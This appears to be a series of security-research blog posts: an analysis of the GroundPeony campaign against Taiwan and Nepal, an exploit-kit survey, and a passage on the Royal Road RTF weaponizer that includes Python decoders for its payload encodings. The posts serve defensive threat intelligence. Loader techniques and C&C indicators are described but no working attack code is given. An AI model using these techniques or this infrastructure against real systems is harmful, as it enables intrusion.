<p><img src="https://nao-sec.org/assets/2023-08-22/top.png" alt="" /></p> <p>This blog post is based on “GroundPeony: Crawling with Malice” that we presented at HITCON CMT 2023. We are grateful to HITCON for giving us the opportunity to present.</p> <p><a href="https://hitcon.org/2023/CMT/en/agenda/e8fe6942-9c60-419a-b9a0-dbda80a27ad0/">https://hitcon.org/2023/CMT/en/agenda/e8fe6942-9c60-419a-b9a0-dbda80a27ad0/</a></p> <p>Presentation material (PDF) is <a href="https://github.com/nao-sec/materials/blob/master/HITCON2023/GroundPeony_Crawling_with_Malice.pdf">here</a>.</p> <h2 id="abstract">Abstract</h2> <p>In March 2023, we discovered a cyber attack campaign targeting Taiwanese government agencies. The campaign employed devious tactics such as tampering with legitimate websites to distribute malware, using URL obfuscation, and employing multi-stage loaders. In this post, we will first provide an overview of this attack campaign and share the analysis results of the malware used. Through this, the reader will be able to understand the latest attack cases targeting Taiwan.</p> <p>As a result of our investigation, we suspect that this attack campaign was orchestrated by a China-nexus attack group. We will discuss the specific evidence supporting this assumption, and trace back to past attack campaigns. Past campaigns include attacks that exploited CVE-2022-30190, known as Follina, while it was still a zero-day. These studies help in understanding the attackers’ motivations and background.</p> <p>This post will enable SOC analysts, IR team members, CSIRT personnel, and others to gain a deep understanding of the latest APT attack trends targeting East and South Asia including Taiwan that have never been reported so far, and to take concrete countermeasures.</p> <h2 id="groundpeony">GroundPeony</h2> <p>The name “GroundPeony” was created by us and is not generally known. 
Based on our reading of the few public reports, we believe they are identical or close to the group dubbed UNC3347<sup id="fnref:1" role="doc-noteref"><a href="#fn:1" class="footnote" rel="footnote">1</a></sup> by Mandiant. Active since at least 2021, it targets government organizations in East and South Asia, specifically Taiwan and Nepal.</p> <p>There are two points to note about this group. First, GroundPeony exploits zero-day vulnerabilities. Specifically, it was the earliest group to exploit CVE-2022-30190, also known as Follina. Follina itself is not a very complex vulnerability, but it is speculated that this group could develop, or have access to, a zero-day. This is very interesting. Second, GroundPeony compromised websites for malware distribution. In a past case, a Nepalese government website was compromised.</p> <p>For these reasons, GroundPeony is considered to be an APT group with high attack skill and attack motivation.</p> <h2 id="timeline">Timeline</h2> <p>This is a quick look at GroundPeony’s attack timeline.</p> <p><img src="https://nao-sec.org/assets/2023-08-22/timeline.png" alt="" /></p> <p>The malware has existed on VirusTotal since around 2021. The oldest attack campaign we know of is from April to June 2022. Around this time, Follina was exploited to attack Nepal, India, and other countries.</p> <p>After that, we forgot about them for a while, but they started attacking again around March 2023. At this time, they attacked Taiwan and Nepal. In this post, we will deal with the cases of April 2022 and March 2023.</p> <h2 id="latest-attack-flow">Latest Attack Flow</h2> <p>Let’s look at a specific case. The first is the attack on the Taiwanese government that occurred in March 2023.</p> <p><img src="https://nao-sec.org/assets/2023-08-22/flow.png" alt="" /></p> <p>The attack started with a spear-phishing email that has a DOC file attached. A URL is written in the DOC file, and a ZIP file is downloaded from that URL. 
The ZIP file contains an EXE file and a DLL file; executing them infects the host with the malware.</p> <p><img src="https://nao-sec.org/assets/2023-08-22/mail.png" alt="" /></p> <p>The spear-phishing email looked like this. It is about discussions on maritime issues between Taiwan and the USA. This time, I put a mosaic in the image, but the destination was a Taiwanese government organization. Also, the sender was a cable TV company in Taiwan. Attached to the email is a DOC file with the file name “Regarding bilateral consultations with the USA”.</p> <p><img src="https://nao-sec.org/assets/2023-08-22/doc.png" alt="" /></p> <p>When the attached DOC file is opened, it looks like this. Instead of any real content, it shows a fake error and says to apply an update to resolve it. A URL is given for downloading the update. Trying to download the update file from this URL actually downloads a ZIP file containing malware.</p> <p><img src="https://nao-sec.org/assets/2023-08-22/url.png" alt="" /></p> <p>The URL used at this time is very strange. At first glance, it may look like a legitimate Microsoft website. But, due to the structure of the URL, the actual host is Cuttly.</p> <p>When you access this URL, you reach Cuttly, which then redirects to the ZIP file. At this time, the URL that Cuttly redirected to was the website of a Taiwanese educational institution. This website had been compromised, and a ZIP file containing malware was placed on it.</p> <p><img src="https://nao-sec.org/assets/2023-08-22/zip.png" alt="" /></p> <p>The ZIP file contains 2 EXE files, one TXT file, and one directory named “$RECYCLE.BIN” that looks like the Windows Recycle Bin. There are 4 files in the $RECYCLE.BIN directory, all with the DOCX extension. But these are not DOCX files. They are actually malware.</p> <p>By the way, did you notice that the update numbers written in the DOC file and the ZIP file are different? 
We don’t know if this was simply a mistake by the attacker or a remnant of another ongoing attack campaign.</p> <p><img src="https://nao-sec.org/assets/2023-08-22/kb.png" alt="" /></p> <h2 id="malware-analysis">Malware Analysis</h2> <p>Let’s take a look at how the malware is executed. First, there are 2 files with the EXE extension included in the ZIP file, 系統安全補丁.exe and Install.exe, but the behavior of both is the same.</p> <p>When the EXE file is executed, the 4 files placed in $RECYCLE.BIN are copied to the mic directory under the ProgramData directory. At this time, the names of the 4 files are also changed: they are renamed to mic.exe, version.dll, mic.doc and mic.ver. Then, mic.exe is executed.</p> <p>mic.exe is a legitimate file with a digital signature, but it loads version.dll from the same directory. When version.dll is executed through DLL Side-Loading, it loads and decrypts mic.doc. The decryption result is malware we call “micDown”.</p> <p><img src="https://nao-sec.org/assets/2023-08-22/micdown.png" alt="" /></p> <ol> <li>mic.exe <ul> <li>Legitimate EXE file with a digital signature</li> </ul> </li> <li>version.dll <ul> <li>DLL for Side-Loading</li> <li>Shellcode launcher for mic.doc</li> </ul> </li> <li>mic.doc <ul> <li>Shellcode downloader (micDown)</li> </ul> </li> <li>mic.ver <ul> <li>Config file for micDown</li> </ul> </li> </ol> <p>The decoding performed by version.dll proceeds in two steps. First, version.dll decodes mic.doc and executes it as shellcode. The shellcode then further decodes itself and continues execution.</p> <p><img src="https://nao-sec.org/assets/2023-08-22/versiondll.png" alt="" /></p> <p>The export function of version.dll is very simple. First, it reads mic.doc into a memory area allocated by VirtualAlloc with read, write, and execute permissions. Then, it decodes that data with a custom XOR algorithm that combines sub, xor and add instructions. 
When decoding is complete, execution jumps to the memory area holding the decoded shellcode.</p> <p><img src="https://nao-sec.org/assets/2023-08-22/dll1.png" alt="" /></p> <p><img src="https://nao-sec.org/assets/2023-08-22/dll2.png" alt="" /></p> <p>The decoded shellcode uses the same custom XOR algorithm as before, and RtlDecompressBuffer is then used to decompress the result. The shellcode is decoded from the beginning of the file, excluding the initial jump instruction.</p> <p><img src="https://nao-sec.org/assets/2023-08-22/doc1.png" alt="" /></p> <p><img src="https://nao-sec.org/assets/2023-08-22/doc2.png" alt="" /></p> <p>The decoded code executes an executable whose MZ header has been removed. It also decodes the data in mic.ver and uses it as its configuration. Finally, it downloads shellcode from the C&amp;C server stored in the config and executes it.</p> <p><img src="https://nao-sec.org/assets/2023-08-22/payload1.png" alt="" /></p> <p><img src="https://nao-sec.org/assets/2023-08-22/payload2.png" alt="" /></p> <p>The downloaded shellcode is encoded with an algorithm similar to the one used for the files; it differs slightly in that the order of the add, sub and xor instructions is swapped.</p> <p><img src="https://nao-sec.org/assets/2023-08-22/payload3.png" alt="" /></p> <p><img src="https://nao-sec.org/assets/2023-08-22/payload4.png" alt="" /></p> <p><img src="https://nao-sec.org/assets/2023-08-22/payload5.png" alt="" /></p> <p>The encoded config consists of a 0x40-byte C&amp;C host area and a 0x2-byte port area. The IP address at the time was 103[.]199.17.184.</p> <p><img src="https://nao-sec.org/assets/2023-08-22/ver1.png" alt="" /></p> <p><img src="https://nao-sec.org/assets/2023-08-22/ver2.png" alt="" /></p> <h2 id="related-file">Related File</h2> <p>An attack similar to the Taiwanese attack described above was also carried out in Nepal. 
Although the exact origin of the attack is unknown, as in Taiwan a legitimate website was compromised and a ZIP file was placed on it.</p> <p>The compromised legitimate website was the Nepalese government’s COVID-19 vaccine-related website. For reference, China is known to have provided vaccines to Nepal as part of its One Belt, One Road partnership<sup id="fnref:2" role="doc-noteref"><a href="#fn:2" class="footnote" rel="footnote">2</a></sup>. It is unclear whether this has anything to do with the attack campaign.</p> <p>In the attack against Nepal, app.onedrivo[.]com was used as the C&amp;C server. The domain was registered through PublicDomainRegistry. More on this domain later.</p> <p>In the attack against Nepal the malware behaves the same way. When the EXE file is executed, it copies and renames the files and executes mic.exe. mic.exe side-loads version.dll, and version.dll reads, decodes and executes mic.doc. The malware executed was the same as before: micDown.</p> <p><img src="https://nao-sec.org/assets/2023-08-22/flow2.png" alt="" /></p> <h2 id="related-past-campaign">Related Past Campaign</h2> <p>The C&amp;C server used in the Nepal attack described above has been used in other attacks in the past. One such attack, also against Nepal, occurred in April 2022. At that time, this group exploited CVE-2022-30190, also known as Follina, and ultimately executed a CobaltStrike beacon. This domain served both as the download server for CobaltStrike and as the C&amp;C server.</p> <p><img src="https://nao-sec.org/assets/2023-08-22/past.png" alt="" /></p> <p>The DOCX file that served as the decoy is a statement of accusation by a person claiming to be a student at Kathmandu University. We do not know whether the accusation is genuine.</p> <p><img src="https://nao-sec.org/assets/2023-08-22/decoy.png" alt="" /></p> <p>This DOCX file contains external link settings that cause it to load an HTML file. The HTML file contains JavaScript code that changes the location. 
The new location uses the ms-msdt scheme, the scheme for the Microsoft Support Diagnostic Tool. A bug in this handler allowed PowerShell code to be executed, so PowerShell code could be executed from a DOCX file.</p> <p><img src="https://nao-sec.org/assets/2023-08-22/xml.png" alt="" /></p> <p>The PowerShell code downloads a CAB file from the server, extracts it and executes the contents.</p> <p><img src="https://nao-sec.org/assets/2023-08-22/ps1.png" alt="" /></p> <p>Inside the CAB file is an EXE file built with PyInstaller. This EXE is a downloader: it downloads the CobaltStrike beacon from onedrivo[.]com and runs it.</p> <p><img src="https://nao-sec.org/assets/2023-08-22/pyi.png" alt="" /></p> <h2 id="attribution">Attribution</h2> <p>Let us consider the attribution of this group. To begin with, it matters when this group was exploiting Follina. Follina was eventually exploited by a very large number of APT groups, but only after the details were made public. Here is the timeline.</p> <p><img src="https://nao-sec.org/assets/2023-08-22/follina.png" alt="" /></p> <p>Follina first became publicly known through our tweets. We discovered the Follina sample targeting Belarus on May 27 and tweeted about it. Since then, detailed explanatory blogs have been published and PoCs have been released.</p> <p>Going back earlier, a vulnerability was reported to Microsoft by the ShadowChasing group on April 12. However, Microsoft did not acknowledge it as a vulnerability at that time. The reported attack was also against Belarus.</p> <p>Let’s go back further. In our research, we found samples from April 7 and 8. These are attacks against Nepal and India, and we believe they are the earliest Follina samples. They are attacks by the group Mandiant calls UNC3347, which we call GroundPeony.</p> <p>In other words, GroundPeony was exploiting Follina during a true zero-day window. 
Various organizations have written reports about Follina exploitation, but China-nexus groups are the only ones that exploited Follina during the zero-day period. Therefore, we believe GroundPeony is the only China-nexus APT group with zero-day access.</p> <p>Let’s look at another indicator. We analyzed the PyInstaller-built EXE file that is executed after the Follina exploit. Python code can easily be decompiled from a PyInstaller binary. The extracted file looked like this.</p> <p><img src="https://nao-sec.org/assets/2023-08-22/python.png" alt="" /></p> <p>It contains a large number of Chinese comments. The code was copy-pasted from various public repositories, most of which were written by Chinese developers. This is a very elementary mistake; in any case, it is highly likely that the person who created the malware is a native Chinese speaker.</p> <p>We tried mapping the victims (and presumed victims). It is a very interesting diagram. What does it mean?</p> <p><img src="https://nao-sec.org/assets/2023-08-22/map.png" alt="" /></p> <p>Based on our previous research, we have created a diamond model.</p> <p><img src="https://nao-sec.org/assets/2023-08-22/diamond.png" alt="" /></p> <p>GroundPeony, also known as UNC3347, is a China-nexus APT group. They have been active since at least 2021. They target East and South Asia, including Taiwan and Nepal. In particular, they seem to be targeting government agencies, research institutions, and telecoms.</p> <p>The attacks begin with spear-phishing emails. They compromise legitimate websites and use them in their attacks. There was nothing unique about the IP addresses used, and no connection to the victim country could be found. GroundPeony also has zero-day access. Besides popular tools such as CobaltStrike, they also use the group’s own malware.</p> <h2 id="wrap-up">Wrap-Up</h2> <p>GroundPeony is an APT group about which little is known so far. It is believed to be China-nexus. 
It targets East and South Asian countries such as Taiwan and Nepal. In particular, it seems to target government agencies, research institutions, and telecoms.</p> <p>One point worth noting is their use of zero-days: Follina was exploited in its earliest period. This group also compromises legitimate websites and places malware on them. GroundPeony is an aggressive APT group. Please keep an eye on their future developments.</p> <h2 id="ioc">IoC</h2> <h2 id="references">References</h2> <div class="footnotes" role="doc-endnotes"> <ol> <li id="fn:1" role="doc-endnote"> <p>Mandiant, “Move, Patch, Get Out the Way: 2022 Zero-Day Exploitation Continues at an Elevated Pace”, https://www.mandiant.com/resources/blog/zero-days-exploited-2022 <a href="#fnref:1" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:2" role="doc-endnote"> <p>Ministry of Foreign Affairs of the People’s Republic of China, “Initiative for Belt and Road Partnership on COVID-19 Vaccines Cooperation”, https://www.fmprc.gov.cn/mfa_eng/wjdt_665385/2649_665393/202106/t20210624_9170568.html <a href="#fnref:2" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> </ol> </div>
  57. Exploit Kit still sharpens a sword

    Thu, 15 Apr 2021 15:00:00 -0000

    <p>Note: This blog post will not be relevant to most readers.</p> <p>It’s 2021 now, and the first quarter has already passed. I thought Drive-by Download attacks were dead four years ago. Angler Exploit Kit disappeared, the pseudo-Darkleech and EITest campaigns disappeared, and RIG Exploit Kit declined. At that time, Drive-by Download attacks were definitely supposed to die. However, even in 2021 they have not disappeared; the embers are still glowing.</p> <p>In April 2021, I received some incredible notices, for example the following.</p> <ul> <li>PurpleFox Exploit Kit has started exploiting CVE-2021-26411</li> <li>RIG Exploit Kit has started exploiting CVE-2021-26411</li> <li>Bottle Exploit Kit is back, and has started exploiting CVE-2020-1380 and CVE-2021-26411</li> <li>Underminer Exploit Kit is back</li> </ul> <p>Let me repeat: it’s 2021, not 2017. Internet Explorer has been displaced by Chrome and Edge, and Drive-by Download attacks were supposed to die. Why are there still Drive-by Download attacks? Here are some reasons, including the opinions of my friends.</p> <ol> <li>Internet Explorer is still used in some countries/regions, including Japan</li> <li>Due to the influence of the coronavirus pandemic, remote work has increased, and the number of users with weak network security has increased</li> <li>Internet Explorer vulnerabilities are still being discovered and exploit code is still being published</li> </ol> <p>In reality, these are intricately intertwined, and there may be other reasons.</p> <p>In any case, Drive-by Download attacks are still being observed, and they are a little more active. This is irrelevant for most people, because most people don’t use Internet Explorer. If you don’t use Internet Explorer, a typical Exploit Kit attack is not a threat. A small number of targeted attacks may use Chrome 0-days, which are not discussed here.</p> <p>For the few enthusiastic Internet Explorer users who still exist, I write this blog post. 
In other words, I will introduce the characteristics of the common Drive-by Download attacks you may encounter as of April 2021. Thanks to my friends (@jeromesegura, @nao_sec members) for helping me write this blog post.</p> <h2 id="exploit-kit-landscape">Exploit Kit Landscape</h2> <p>As of April 2021, the following six Exploit Kits have been observed to be active.</p> <ul> <li>RIG</li> <li>Spelevo</li> <li>PurpleFox</li> <li>Underminer</li> <li>Bottle</li> <li>Magnitude</li> </ul> <p>nao_sec has been running a fully automatic Drive-by Download attack observation environment called Augma System[1] for three years. The data it observed is shown below. Some Exploit Kits are not counted because they are observed in different environments.</p> <p><img src="https://nao-sec.org/assets/2021-04-16/ek.png" alt="" /></p> <p>The features of the six Exploit Kits currently observed are as follows.</p> <table> <thead> <tr> <th> </th> <th>Private</th> <th>Actively updated</th> <th>Exploits</th> </tr> </thead> <tbody> <tr> <td>RIG</td> <td>No</td> <td>Yes</td> <td>CVE-2020-0674, CVE-2021-26411</td> </tr> <tr> <td>Spelevo</td> <td>No</td> <td>No</td> <td>CVE-2018-8174, CVE-2018-15982</td> </tr> <tr> <td>PurpleFox</td> <td>Yes</td> <td>Yes</td> <td>CVE-2021-26411</td> </tr> <tr> <td>Underminer</td> <td>Yes</td> <td>No</td> <td>CVE-2018-15982</td> </tr> <tr> <td>Bottle</td> <td>Yes</td> <td>Yes</td> <td>CVE-2020-1380, CVE-2021-26411</td> </tr> <tr> <td>Magnitude</td> <td>Yes</td> <td>Yes</td> <td>CVE-2021-26411</td> </tr> </tbody> </table> <p>Here is sample traffic for each.</p> <h3 id="rig-exploit-kit">RIG Exploit Kit</h3> <p>RIG is an Exploit Kit that has been active since around 2014. It was extremely active from 2016 to 2017, but then declined with the advent of Fallout and others. However, it is still active in 2021.</p> <p>RIG started abusing CVE-2021-26411 in April 2021 and is still incorporating changes. Its landing pages are no longer obfuscated as they used to be. 
The code is very simple, and the malware is RC4 encrypted.</p> <p><img src="https://nao-sec.org/assets/2021-04-16/rig.png" alt="" /></p> <p>Download sample traffic <a href="https://nao-sec.org/assets/2021-04-16/rig.saz">here</a>.</p> <h3 id="spelevo-exploit-kit">Spelevo Exploit Kit</h3> <p>Spelevo is an Exploit Kit that appeared in 2019. It was already mature in 2020, and in 2021 it is one of the most active Exploit Kits.</p> <p>Spelevo hasn’t changed for a long time. It hides the malware in an image. See this article[2] for detailed behavior.</p> <p><img src="https://nao-sec.org/assets/2021-04-16/spelevo.png" alt="" /></p> <p>Download sample traffic <a href="https://nao-sec.org/assets/2021-04-16/spelevo.saz">here</a>.</p> <h3 id="purplefox-exploit-kit">PurpleFox Exploit Kit</h3> <p>PurpleFox is an Exploit Kit that has been active since 2019. It is a private exploit kit used to deliver the PurpleFox malware. Its operators are keen on exploits and fairly fast at incorporating new vulnerabilities.</p> <p>PurpleFox started exploiting CVE-2021-26411 in April 2021. However, the other parts have not changed for a long time.</p> <p><img src="https://nao-sec.org/assets/2021-04-16/purplefox.png" alt="" /></p> <p>Download sample traffic <a href="https://nao-sec.org/assets/2021-04-16/purplefox.saz">here</a>.</p> <h3 id="underminer-exploit-kit">Underminer Exploit Kit</h3> <p>Underminer is an Exploit Kit that appeared in 2018. It is a pretty distinctive Exploit Kit, known to be extremely difficult to analyze. It is used to deliver its own malware, called Hidden Bee. See this article[3] for more details.</p> <p>Underminer cycles between several months of activity and several months of silence. It had been silent since November 2020, but was revived in April 2021. 
But its essence hasn’t changed at all.</p> <p><img src="https://nao-sec.org/assets/2021-04-16/underminer.png" alt="" /></p> <p>Download sample traffic <a href="https://nao-sec.org/assets/2021-04-16/underminer.saz">here</a>.</p> <h3 id="bottle-exploit-kit">Bottle Exploit Kit</h3> <p>Bottle is an Exploit Kit that appeared in 2019. It is an extremely rare Exploit Kit that targets only Japan, and it is used to deliver its own malware, called Cinobi.</p> <p>It is one of the most active Exploit Kits in Japan. It had not been observed since November 2020, but it was revived in April 2021. It is also worth noting that, unlike other Exploit Kits, it exploits CVE-2020-1380 as well as CVE-2021-26411. It has been pointed out that it is related to MageCart and phishing campaigns. See this article[4] for more details.</p> <p><img src="https://nao-sec.org/assets/2021-04-16/bottle.png" alt="" /></p> <p>Download sample traffic <a href="https://nao-sec.org/assets/2021-04-16/bottle.saz">here</a>.</p> <h3 id="magnitude-exploit-kit">Magnitude Exploit Kit</h3> <p>Magnitude is one of the oldest Exploit Kits still in existence. It has been observed only in certain countries/regions such as South Korea and Taiwan, and its details have not been reported much.</p> <p>Its activity was also reported in April 2021. It exploits CVE-2021-26411 and is still actively evolving.</p> <blockquote class="twitter-tweet"><p lang="en" dir="ltr">One more: <a href="https://twitter.com/hashtag/MagnitudeEK?src=hash&amp;ref_src=twsrc%5Etfw">#MagnitudeEK</a> <a href="https://t.co/pOuIZzAPZG">pic.twitter.com/pOuIZzAPZG</a></p>&mdash; Jérôme Segura (@jeromesegura) <a href="https://twitter.com/jeromesegura/status/1382395637480656896?ref_src=twsrc%5Etfw">April 14, 2021</a></blockquote> <h2 id="finally">Finally</h2> <p>Drive-by Download attacks are still observed in 2021. They are irrelevant to most people. 
As with Adobe Flash Player, stop using Internet Explorer immediately. That is the simplest solution. Drive-by Download attacks continue to exist with Internet Explorer.</p> <h2 id="references">References</h2> <p>[1] <a href="https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-KoikeChubachi.pdf">https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-KoikeChubachi.pdf</a><br /> [2] <a href="https://insight-jp.nttsecurity.com/post/102gsqj/pseudogatespelevo-exploit-kit">https://insight-jp.nttsecurity.com/post/102gsqj/pseudogatespelevo-exploit-kit</a><br /> [3] <a href="https://blog.malwarebytes.com/threat-analysis/2019/08/the-hidden-bee-infection-chain-part-1-the-stegano-pack/">https://blog.malwarebytes.com/threat-analysis/2019/08/the-hidden-bee-infection-chain-part-1-the-stegano-pack/</a><br /> [4] <a href="http://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_103_koike-takai_jp.pdf">http://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_103_koike-takai_jp.pdf</a></p>
  58. Royal Road! Re:Dive

    Mon, 04 Jan 2021 15:00:00 -0000

Abstract

We introduced the “Royal Road RTF Weaponizer” in our previous blog [1] (and presented it at Japan Security Analyst Conference 2020 and CPX 360 CPRCon 2020). Royal Road is a tool shared by many targeted attack groups believed to belong to China. It has been a year since our previous blog, and Royal Road is still in use. Here, we introduce the Royal Road-related attacks observed during 2020.

Previous Blog

Let’s briefly review the previous blog. Royal Road is a tool that generates RTF files exploiting the Microsoft Office Equation Editor vulnerabilities (CVE-2017-11882, CVE-2018-0798, CVE-2018-0802). The details of the tool are unknown, but the RTF files it generates have various characteristic features. The definition of “RTF file generated by Royal Road” may vary from researcher to researcher, so we define a file that meets both of the following conditions as an “RTF file generated by Royal Road”:

- It exploits a vulnerability in Microsoft Office Equation Editor
- It contains an object named “8.t”

However, some RTF files are likely related to Royal Road even though they do not meet the second condition. For classification purposes, we refer to these as “Related Samples”. In reality, these may also be RTF files generated by Royal Road, but only the attacker knows the truth. For our research, we have divided samples into “Royal Road Samples” and “Related Samples”, but they are treated the same in the specific case studies below.

Royal Road is shared among various attack groups believed to belong to China. Specifically, it is believed to be used by the following attack groups. Aliases are given for reference; strictly speaking, they are not always equivalent. For example, TA428 and Pirate Panda are not exactly the same.
- Temp.Tick (BRONZE BUTLER, RedBaldKnight)
- Temp.Conimes (Goblin Panda, Cycldek)
- Temp.Periscope (Leviathan, APT40)
- Temp.Trident (Dagger Panda, IceFog)
- Tonto (Karma Panda, CactusPete, LoneRanger)
- TA428 (Pirate Panda)
- Rancor

We also categorized the various characteristics of the RTF files used by these groups and showed what they have in common.

Updates

It has been a year since we introduced Royal Road. In the meantime, RTF files believed to have been generated by Royal Road have been used many times in targeted attacks, and several updates have been observed. First, we introduce the updates.

The RTF file generated by Royal Road contains encoded malware, which is decoded by shellcode after exploitation. In our previous blog, we introduced the following five encodings, listed by the first four bytes of the encoded object:

1. 4D 5A 90 00 (not encoded)
2. F2 A3 20 72
3. B2 A6 6D FF
4. B0 74 77 46
5. B2 5A 6F 00

Many of the RTF files we observed in 2020 used the 3rd and 4th encodings. However, a few samples used new encodings, the following two.

A9 A4 6E FE

This encoding can be decoded with code like the following (enc_data is the encoded object as bytes):

    dec_data = []
    for i in range(len(enc_data)):
        # XOR each byte with 0x7b, then add 0x7b (mod 256)
        dec_data.append(((enc_data[i] ^ 0x7b) + 0x7b) % 256)
    dec_data = bytes(dec_data)

94 5F DA D8

This encoding can be decoded with code like the following:

    dec_data = []
    xor_key = 1387678300
    for i in range(len(enc_data)):
        # step the shift register 7 times per byte; feedback from bits 29, 3 and 0
        for _ in range(7):
            x0 = (xor_key & 0x20000000) == 0x20000000
            x1 = (xor_key & 8) == 8
            x2 = xor_key & 1
            x3 = 1 + (x0 ^ x1 ^ x2)
            # keep the register at 32 bits; the low bits that drive the output are unaffected
            xor_key = ((xor_key + xor_key) + x3) & 0xFFFFFFFF
        dec_data.append(enc_data[i] ^ (xor_key % 256))
    dec_data = bytes(dec_data)

Our tool for decoding Royal Road encoded objects is already available on GitHub and also supports the above new encodings: https://github.com/nao-sec/rr_decoder

New Attack Groups

As mentioned earlier, several attack groups use Royal Road. The following eight attack groups were observed using Royal Road (including both Royal Road Samples and Related Samples) during 2020.
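As an added example (not nao_sec's rr_decoder and not code from the post), the following Python identifies which of the known Royal Road encodings an extracted object uses and decodes the two new ones from the Updates section above. The function names, the signature labels and the constructed sample payload are my own; the four older encodings are recognized only by their listed prefix, since their algorithms are not given here.

```python
# Added example, not nao_sec's rr_decoder: identify and decode Royal Road
# encoded objects for the two new encodings above, and scan for the seven
# known 4-byte prefixes (each prefix is the encoded "4D 5A 90 00" MZ header).
from typing import Iterator, Optional

MZ_HEADER = b"MZ\x90\x00"

# First 4 bytes of an encoded object, as listed in the post; labels are mine.
SIGNATURES = {
    bytes.fromhex("4D5A9000"): "1: not encoded",
    bytes.fromhex("F2A32072"): "2: previous blog",
    bytes.fromhex("B2A66DFF"): "3: previous blog",
    bytes.fromhex("B0747746"): "4: previous blog",
    bytes.fromhex("B25A6F00"): "5: previous blog",
    bytes.fromhex("A9A46EFE"): "6: xor/add 0x7b (new)",
    bytes.fromhex("945FDAD8"): "7: lfsr 1387678300 (new)",
}


def decode_xor_add(enc: bytes, key: int = 0x7B) -> bytes:
    """Byte-wise (b ^ key) + key mod 256; turns A9 A4 6E FE into 4D 5A 90 00."""
    return bytes(((b ^ key) + key) & 0xFF for b in enc)


def encode_xor_add(dec: bytes, key: int = 0x7B) -> bytes:
    """Inverse of decode_xor_add; used here only to build test input."""
    return bytes(((b - key) & 0xFF) ^ key for b in dec)


def lfsr_keystream(n: int, seed: int = 1387678300) -> Iterator[int]:
    """Yield n keystream bytes. The 32-bit register is stepped 7 times per
    output byte; each step shifts left and adds 1 + (bit29 ^ bit3 ^ bit0),
    as in the decoder above. The low byte after the 7 steps is the key."""
    key = seed
    for _ in range(n):
        for _ in range(7):
            fb = ((key >> 29) ^ (key >> 3) ^ key) & 1
            key = ((key << 1) + 1 + fb) & 0xFFFFFFFF
        yield key & 0xFF


def crypt_lfsr(data: bytes, seed: int = 1387678300) -> bytes:
    """XOR with the keystream; symmetric, so one function encodes and decodes."""
    return bytes(b ^ k for b, k in zip(data, lfsr_keystream(len(data), seed)))


# Only the encodings whose algorithm is described above can be decoded.
DECODERS = {
    "1: not encoded": bytes,
    "6: xor/add 0x7b (new)": decode_xor_add,
    "7: lfsr 1387678300 (new)": crypt_lfsr,
}


def identify_and_decode(obj: bytes) -> Optional[tuple[str, bytes]]:
    """Trial-decode the first 4 bytes with each decoder and accept the first
    that yields the MZ header. Returns (label, decoded object) or None."""
    for label, fn in DECODERS.items():
        if fn(obj[:4]) == MZ_HEADER:
            return label, fn(obj)
    return None


def scan_signatures(blob: bytes) -> list[tuple[int, str]]:
    """Offsets in blob where any known Royal Road object prefix occurs, so an
    RTF or memory dump can be triaged even when the encoding is undecodable."""
    hits = []
    for sig, label in SIGNATURES.items():
        start = 0
        while (pos := blob.find(sig, start)) != -1:
            hits.append((pos, label))
            start = pos + 1
    return sorted(hits)


# Constructed stand-in for a decoded object: an MZ header plus filler, not a PE.
SAMPLE = MZ_HEADER + b"\x03\x00\x00\x00" + b"constructed Royal Road test payload " * 3

if __name__ == "__main__":
    for enc in (SAMPLE, encode_xor_add(SAMPLE), crypt_lfsr(SAMPLE)):
        label, dec = identify_and_decode(enc)
        print(f"{enc[:4].hex()} -> {label}: round-trip ok={dec == SAMPLE}")
    print(scan_signatures(b"\x00" * 5 + crypt_lfsr(SAMPLE)))
```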
1. Temp.Conimes
2. Tonto
3. TA428
4. Naikon
5. Higaisa
6. Vicious Panda
7. FunnyDream
8. TA410

Of these, we already reported on groups 1-3 in our previous blog. Temp.Conimes used NewCore RAT to attack Vietnamese organizations. Tonto used Bisonal to attack organizations in East Asia, including Russia. TA428 was also particularly active, using PoisonIvy, Cotx RAT, Tmanger, and nccTrojan to attack East Asian organizations, including in Mongolia. We do not cover these individual cases here, but if you are interested, see the IOC section. For TA428, the paper [2] and blogs [3][4][5] from NSJ (NTT Security Japan) are available; please refer to them. For Naikon, CheckPoint Research reported [6], but unfortunately we could not observe this ourselves. Therefore, in the following we introduce Royal Road-related attack cases for the remaining four groups (5-8).

Higaisa

Higaisa is an attack group that seems to have been active since at least around 2016. It primarily targets North Korea-related organizations and is believed to aim at stealing information using AttackBot, PIZ Stealer, and Gh0st RAT. Blogs have been written by Tencent and Positive Technologies so far [7][8][9], attributing it to (South) Korea. However, NSJ’s paper [10] showed a connection with Ghost Dragon [11] and PKPLUG [12], and it was reported that the group might belong to China.

We observed a Royal Road attack by Higaisa in March 2020. The malware executed by the Royal Road RTF was AttackBot, a downloader that has been used by Higaisa since at least April 2018.

Vicious Panda

Vicious Panda is an attack group reported by CheckPoint Research in March 2020 [13]. It is said to belong to China and targets East Asia, including Russia, Mongolia, and Ukraine.

We observed a Royal Road attack by Vicious Panda in March 2020. It has been reported to execute malware similar to Enfal and BYEBY.

FunnyDream

FunnyDream is an attack group that is said to have been active since around 2018. It is said to belong to China and targets Southeast Asia, including Vietnam and Malaysia. FunnyDream uses Chinoxy and FunnyDream Backdoor. BitDefender has published a detailed report [14] on FunnyDream.

We observed attacks by FunnyDream from March to May 2020. Chinoxy is a RAT that has been used by FunnyDream since around 2018. It decodes its config using two numeric values and communicates with the C&C server using its own protocol based on Blowfish.

TA410

TA410 is an attack group that is said to have been active since around 2016. It is said to belong to China and is suspected to be related to APT10. Reports have been published by Proofpoint [15][16][17]; it mainly targets the public sector in the US. It uses malware called LockBack and FlowCloud.

We observed an attack by TA410 in October 2020. FlowCloud is a RAT reported by Proofpoint in June 2020. FlowCloud v4 and v5 have been reported, but the FlowCloud we observed at this time was similar to v4.

Attack case against Japan

In addition to the four attack groups shown so far (Higaisa, Vicious Panda, FunnyDream, TA410), other attacks that appear to be related to Royal Road have been observed. Among them, we introduce an example of an attack on Japan. We are not able to identify which attack group carried out this attack. If you have any knowledge about it, please share it with us…

The attack on Japan took place in November 2020. It began with two RTF files attached to an email. These RTF files did not contain an 8.t object, but they did contain a related object: the malware encoded with the 4th (B0 74 77 46) encoding shown above. The overall picture of the attack is as follows.

